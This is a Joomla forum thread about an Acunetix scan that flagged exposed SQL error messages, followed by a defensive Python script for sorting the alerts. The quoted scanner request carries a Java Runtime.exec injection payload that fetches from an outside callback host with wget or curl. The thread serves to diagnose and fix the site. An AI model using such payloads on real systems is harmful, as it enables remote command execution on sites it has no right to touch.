3.8.10 acunetix Medium Severity on filter_order_Dir set to 1

Discussion regarding Joomla! 3.x security issues.

Moderators: mandville, General Support Moderators

fc338339
Joomla! Apprentice
Posts: 18
Joined: Tue Jul 19, 2016 10:27 pm

3.8.10 acunetix Medium Severity on filter_order_Dir set to 1

Post by fc338339 » Wed Sep 26, 2018 12:34 pm

Dear Sirs,

When I updated my website and scanned it with Acunetix, I got 740 medium-severity alerts, as in the report below! How can we fix this problem?

Thanks

// ===== Acunetix reports ==== //

Alert group Application error message
Severity Medium
Description
This alert requires manual confirmation
Application error or warning messages may expose sensitive information about an application's
internal workings to an attacker.
Acunetix found an error or warning message that may disclose sensitive information. The
message may also contain the location of the file that produced an unhandled exception. Consult
the 'Attack details' section for more information about the affected page.
Recommendations
Verify that this page is disclosing error or warning messages and properly configure the
application to log errors to a file instead of displaying the error to the user.
Alert variants
Details
URL encoded POST input filter_order_Dir was set to 1
Pattern found:
You have an error in your SQL syntax
POST /index.php/cn/servicecategory/%E5%A1%91%E6%96%99%E6%80%A7%E8%83%BD%E6%B5%8B%E8%AF%95.feed HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: https://www.labtestone.org/
Connection: keep-alive
Authorization: Basic YW5vbnltb3VzOmFub255bW91cw==
Accept: */*
Accept-Encoding: gzip,deflate
Content-Length: 192
Host: www.labtestone.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
filter_order=1&filter_order_Dir[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('wget+http://hitipzQwMaGB5.bxss.me/||curl+htt ... 5.bxss.me/')]=1&limitstart=1&task=1

toivo
Joomla! Master
Posts: 17426
Joined: Thu Feb 15, 2007 5:48 am
Location: Sydney, Australia

Re: 3.8.10 acunetix Medium Severity on filter_order_Dir set to 1

Post by toivo » Wed Sep 26, 2018 12:46 pm

Your site produces the following message:
403: Access Forbidden
Your location (GB) has been blacklisted.
Toivo Talikka, Global Moderator

CyrusXxX
Joomla! Enthusiast
Posts: 236
Joined: Wed Oct 04, 2017 6:23 am
Location: Belgrade Serbia

Re: 3.8.10 acunetix Medium Severity on filter_order_Dir set to 1

Post by CyrusXxX » Wed Sep 26, 2018 1:28 pm

Description
This alert requires manual confirmation
Application error or warning messages may expose sensitive information about an application's
internal workings to an attacker.
Acunetix found an error or warning message that may disclose sensitive information. The
message may also contain the location of the file that produced an unhandled exception. Consult
the 'Attack details' section for more information about the affected page.
Recommendations
Verify that this page is disclosing error or warning messages and properly configure the
application to log errors to a file instead of displaying the error to the user.

As instructed, visit those pages and check if they give you messages or errors. False positives can happen.

fc338339
Joomla! Apprentice
Posts: 18
Joined: Tue Jul 19, 2016 10:27 pm

Re: 3.8.10 acunetix Medium Severity on filter_order_Dir set to 1

Post by fc338339 » Thu Sep 27, 2018 8:05 am

Dear Sirs,

How to avoid these "false positives"?
Thanks

mandville
Joomla! Master
Posts: 15152
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: 3.8.10 acunetix Medium Severity on filter_order_Dir set to 1

Post by mandville » Thu Sep 27, 2018 8:12 am

fc338339 wrote:
Thu Sep 27, 2018 8:05 am
Dear Sirs,

How to avoid these "false positives"?
Thanks

Options
1. Update Joomla and rescan.
2. Don't use a 3rd party scanner.
3. Ask Acunetix what their results mean or read the instructions first.
E.g. would you ring Persil when your washing machine started beeping, or would you read the manual first?
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

CyrusXxX
Joomla! Enthusiast
Posts: 236
Joined: Wed Oct 04, 2017 6:23 am
Location: Belgrade Serbia

Re: 3.8.10 acunetix Medium Severity on filter_order_Dir set to 1

Post by CyrusXxX » Sun Sep 30, 2018 10:17 pm

When websites are in question, all automated scans will produce false positives, and currently there is no way of avoiding them.

When you receive warnings like that you need to confirm them and separate false from real threats.

I need to point out that many devs in their extensions use coding which sometimes triggers automated scanners.
If you are skilled enough you will be able to figure out what is a false positive or what is a real security issue.
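
One way to do the manual confirmation the scanner report and the replies call for, as an added example that is not part of any forum post: after re-fetching each flagged request, collapse the alerts to one row per page and parameter and check whether the database error text, and a server file path, actually reaches the client. The sample findings (host, paths, statuses, bodies) are constructed, and the `SQLSTATE` signature is an assumed addition to the pattern quoted in the report.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Database error text reaching the client; the first alternative is the
# pattern quoted in the scanner report, the second is an assumed extra.
DB_ERROR = re.compile(r"You have an error in your SQL syntax|SQLSTATE\[\w+\]", re.I)
# Unix-style absolute path to a .php file, as printed with an unhandled exception.
FILE_PATH = re.compile(r"(?<![\w/:.])/(?:home|var|srv|usr|opt)/[\w./-]+\.php")
RANK = {"not-reproduced": 0, "blocked": 1, "confirmed": 2, "confirmed+path": 3}


def classify(status, body):
    """Verdict for one re-fetched response to a flagged request."""
    if DB_ERROR.search(body):
        return "confirmed+path" if FILE_PATH.search(body) else "confirmed"
    if status in (401, 403):
        return "blocked"  # an access rule answered instead of the page
    return "not-reproduced"


def triage(findings):
    """Collapse alerts to one row per (path, parameter), keeping the worst verdict."""
    groups = defaultdict(lambda: {"count": 0, "verdict": "not-reproduced"})
    for f in findings:
        row = groups[(urlsplit(f["url"]).path, f["param"])]
        row["count"] += 1
        verdict = classify(f["status"], f["body"])
        if RANK[verdict] > RANK[row["verdict"]]:
            row["verdict"] = verdict
    return dict(groups)


# Constructed sample findings: host, paths, statuses and bodies are invented.
BASE = "https://example.test/index.php/cn/servicecategory/"
SAMPLE = [
    {"url": BASE + "a.feed", "param": "filter_order_Dir", "status": 500,
     "body": "1064 You have an error in your SQL syntax in /var/www/html/example/list.php"},
    {"url": BASE + "a.feed?page=2", "param": "filter_order_Dir", "status": 200,
     "body": "<p>You have an error in your SQL syntax; check the manual</p>"},
    {"url": BASE + "b.feed", "param": "filter_order_Dir", "status": 403,
     "body": "403: Access Forbidden"},
    {"url": BASE + "c.feed", "param": "filter_order_Dir", "status": 200,
     "body": "<rss version=\"2.0\"><channel></channel></rss>"},
]

if __name__ == "__main__":
    for (path, param), row in triage(SAMPLE).items():
        print(f"{row['verdict']:<15} x{row['count']}  {param}  {path}")
```

Rows marked `confirmed` are the ones where the report's recommendation (log errors to a file instead of displaying them) applies; `blocked` rows say nothing either way until re-tested from an address the site allows.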

